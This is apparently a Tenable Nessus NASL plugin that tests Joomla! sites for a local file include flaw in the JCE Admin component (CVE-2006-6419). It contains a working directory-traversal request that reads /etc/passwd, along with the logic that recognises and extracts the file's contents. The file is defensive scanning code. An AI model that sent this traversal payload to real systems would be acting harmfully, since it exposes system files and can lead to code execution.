code | #
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(23781);
script_version("1.23");
script_cvs_date("Date: 2018/06/13 18:56:26");
script_cve_id("CVE-2006-6419");
script_bugtraq_id(21491);
script_name(english:"JCE Admin Component for Joomla! 'plugin' Parameter Local File Include");
script_summary(english:"Attempts to read a local file with JCE Admin Component.");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
local file include vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of the JCE Admin component for Joomla! running on the
remote host is affected by a local file include vulnerability due to
improper sanitization of user-supplied input to the 'plugin' parameter
before using it in the components/com_jce/jce.php script to include
PHP code. Regardless of the PHP 'register_globals' setting, an
unauthenticated, remote attacker can exploit this issue to disclose
arbitrary files or execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user ID.
In addition, the component is reportedly also affected by multiple
cross-site scripting vulnerabilities involving other parameters to the
same script, as well as an additional local file include
vulnerability; however, Nessus has not checked for these.");
script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
script_set_attribute(attribute:"vuln_publication_date", value:"2006/12/08");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/12/10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("joomla_detect.nasl");
script_require_ports("Services/www", 80);
script_require_keys("installed_sw/Joomla!", "www/PHP");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
url = "/index.php?option=com_jce&task=plugin&plugin=../../../../../../../../../../../../../../etc&file=passwd";
r = http_send_recv3(
method : "GET",
port : port,
item : dir + url,
exit_on_fail : TRUE
);
res = r[2];
# There's a problem if...
if (
# there's an entry for root or...
egrep(pattern:"root:.*:0:[01]:", string:res) ||
# we get an error claiming the file doesn't exist or...
egrep(pattern:"main\(.+/etc/passwd\).*: failed to open stream: No such file", string:res) ||
# we get an error about open_basedir restriction.
egrep(pattern:"main.+ open_basedir restriction in effect. File\(.+/etc/passwd", string:res)
)
{
if (egrep(string:res, pattern:"root:.*:0:[01]:"))
{
contents = strstr(res, "body_outer");
if (contents) contents = contents - strstr(contents, "</td>");
if (contents) contents = contents - 'body_outer">';
if (contents)
{
# Skip over any leading whitespace.
for (i=0; i<strlen(contents); i++)
{
if (contents[i] != '\n' && contents[i] != '\r' && contents[i] != '\t' && contents[i] != ' ')
{
contents = substr(contents, i);
break;
}
}
}
}
else contents = res;
security_report_v4(
port : port,
severity : SECURITY_HOLE,
file : "/etc/passwd",
request : make_list(install_url + url),
output : contents,
attach_type : 'text/plain'
);
exit(0);
}
else
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
|